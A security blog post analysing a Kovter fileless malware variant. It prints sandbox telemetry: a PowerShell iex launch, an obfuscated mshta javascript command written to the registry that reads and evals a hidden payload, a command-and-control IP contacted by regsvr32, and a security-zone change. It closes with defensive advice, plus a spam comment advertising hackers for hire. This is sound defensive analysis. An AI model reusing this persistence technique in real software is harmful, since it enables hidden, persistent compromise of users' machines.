File-less malware : Facelift of APT (Slice - 1)

-

File-less threats are not new to Blue Teams. They have been an integral part of threats in the wild.

Being introduced in mid-2014, this technique has been really difficult to detect and more difficult to defend for Blue teams. These malwares also shortly became one of the primary ways to create a persistent threat, especially in the manufacturing industry.

These threats mostly spread through emails as in organizations, removable media is disabled and downloads from unknown sources are also blocked by admin. When the user downloads and unzips the zip file, auto executable file starts by itself. 

In organization level security policies javascript is a weak point as there is almost no way to restrict them. Most modern websites are dependent upon javascript. File-less threats use that loophole and creates registry entry with malicious javascript. While browser runs that script, it changes critical processes like powershell.

As there is less provision for Blue teams / SOC teams to peek into process dumps of individual systems (there are thousands of them in a organization). This is the reason regular defense won't work against file-less malwares. Pain climbs more when IT or Infra team will run a anti virus scan and expect these to get detected when a Blue team member identifies dns records towards a known CnC server (these APTs use new IPs for each target. Hard to get a known IP with bad reputation score).


Kovter:

Kovter is one type of file-less malware which mainly creates persistence by changing registry entries on Windows based systems. Over time researchers have found a brief working procedure of Kovter.

This illustration by Trend Micro is one fine visual representation of that.





On 26 th January, I stumbled upon a variant of Kovter. 

MD5: b98fff8252a92d495f2080ea9588f71d
The file: B98FFF8252A92D495F2080EA9588F71D.exe

File was  in "C:\Users\admin\AppData\Local\Temp\B98FFF8252A92D495F2080EA9588F71D.exe" 

This executable bypassed bluescreen warning and executed itself.
Details were observed as:

cmdChild: "C:\Users\admin\AppData\Local\Temp\B98FFF8252A92D495F2080EA9588F71D.exe"
cmdParent: "C:\Users\admin\AppData\Local\Temp\B98FFF8252A92D495F2080EA9588F71D.exe"
image: C:\Users\admin\AppData\Local\Temp\B98FFF8252A92D495F2080EA9588F71D.exe
time: 5844 ms

 It also created/modified some user files:

access: READ_CONTROL, SYNCHRONIZE, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES

created: CREATED

device: DISK_FILE_SYSTEM

name: C:\Users\admin\AppData\Roaming\CaviarPlayroom

object: FILE

operation: CREATE

status: 0x00000000

Auto execution of PS was also there as: 

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex $env:dxts

Which runs cmdline: regsvr32.exe

image: C:\Windows\system32\regsvr32.exe

We have to keep in mind that values of regsvr32.exe was modified during process edit and it is the slave executable which acts as file-less malware.

key: HKEY_CLASSES_ROOT\oa73lpa\shell\open\command

name: (default)

operation: write

typeValue: REG_SZ

value: mshta "javascript:a2qjNDh="dXaID7";y5b=new ActiveXObject("WScript.Shell");SKfizDy1o="2854n0zr";Vfr9L1=y5b.RegRead("HKCU\\software\\8b99546859\\e229a6b9");nQWd1Jge="c";eval(Vfr9L1);i13lHmPyIB="tKlG";"

time: 64625 ms

Network behaviour suggest connection to below destinations by regsvr32.

ipDst: 69.27.118.233

ipSrc: 192.168.100.65

portDst: 80

portSrc: 51881

process: C:\Windows\system32\regsvr32.exe

time: 252.40 s

Also found to be changing internet settings:

key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1

name: 1206

operation: write

typeValue: REG_DWORD

value: 0

time: 58547 ms



From Virustotal records it was confirmed that the destination IP was newly comissioned has no bad reputation. But it has to be observed over time as this Kovter type executable was recently found.

Unless we are able to identify the author, motive of later versions of this can't be confirmed.

How this particular file/threat could be identified?

  1. Tight email security should have blocked the email getting delivered with zip from unknown sender
  2. Local executable rights. Generally in IT infrastructure it is seen that installation of softwares is blocked or restricted through admin/IT rights. But portable executables still allowed to run (in many organizations). In this case if execution of any .exe could have been blocked by infra team unless they belong to installed list of softwares (keep in mind when you click on chrome, it actually follows the shortcut path and runs chrome.exe . So if you are planning to block .exe totally then stop it rightway.) This could have prevented the auto execution of this particular file (as this was on .exe).
  3. Active IDS in conjuction with DLP software could have identified the trial to access a particular IP was made by powershell and not a browser. Unless you are an IT giant you don't require people doing curl or ssh from office laptops.
  4. Integrity checks for critical files could have identified the small tweaks.


Release note: I will try to add another analysis whenever I get a previously used spreader(file zero). 






Comments

  1. Hackersphase28 October 2021 at 07:19

    The article you've shared here is fantastic because it provides some excellent information about Social Media Hackers For Hire, that will be incredibly beneficial to me. Thank you for sharing that. Keep up the good work.

    ReplyDelete

Post a Comment

Popular posts from this blog

What is OT Security?

-
Image
A non-theoretical explanation of OT Security. In our normal Cyber Security practices, OT Security is an unusual keyword. Be it LinkedIn or Job portals the search results fetched using OT Security are mere small compared to other Cyber Security keywords. But in the practical world, OT is the most important term and line of service for any industry. If you look at the image the orange portion is the IT network. This IT network grabs most of the cybersecurity budget of an organization. We design secure networks, deploy firewalls, write ACL rules, and implement SIEM solutions to protect the IT infrastructure. Why? Because of inherent ideas, we assume systems that are connected to the internet and visible as a desktop or laptop are the attack surface of a cyber adversary. But if the revenue generation is taken under consideration then it can be observed that these systems are only supporting elements of operations, finance, sales, etc. Obviously, these are very important com...
Read more

Demystifying SCADA Testing - P1

-
Image
There is a big difference between doing pen-tests in IT and doing it in SCADA. Tools and methodology outlines will be almost the same but the main concern is availability. You need to know certain things before attempting to find flaws in industrial networks. Else, you won't realize why shift managers were rushing here and there while you were sitting in their control room with your test laptop. Approach: Always remember we are not trying to prove anything by breaking stuff ruthlessly. A PLC or RTU, stuck in a loop, can delay production for several hours, creating not-so-funny consequences. While trying to assess cyber risk in plants our aim should be clear. Here are few points to keep in mind. Find out unnecessary hosts in the network. These hosts can be legitimate, else they are leaking into the plant network by a badly configured switch or the plant team was badly stuck with finance and they have used a generic switch (those household tp-link/d-link devices).  Try to impersonate...
Read more
-
Image
  M ongoDB is a popular NoSQL database that has been widely adopted by many organizations for its scalability and flexibility. However, with the increase in cyber attacks, it is important to ensure that MongoDB databases are secure to prevent data breaches. As a security engineer, I had to face challenges while creating security checks and security plans on MongoDB. I am trying to collate the sweeter grapes of that journey in this write-up. Some resources might seem a bit high-level, but these can be utilized to come down to a granular level as per your org setup or requirements. Let’s begin :) Authentication MongoDB provides authentication features that allow users to access the database only after providing valid credentials. MongoDB supports several authentication mechanisms, including LDAP, Kerberos, and x.509 certificates. However, SSO integrations for authentication have been the best approach so far. There are various SSO providers, as an example you may use OKTA as SSO inte...
Read more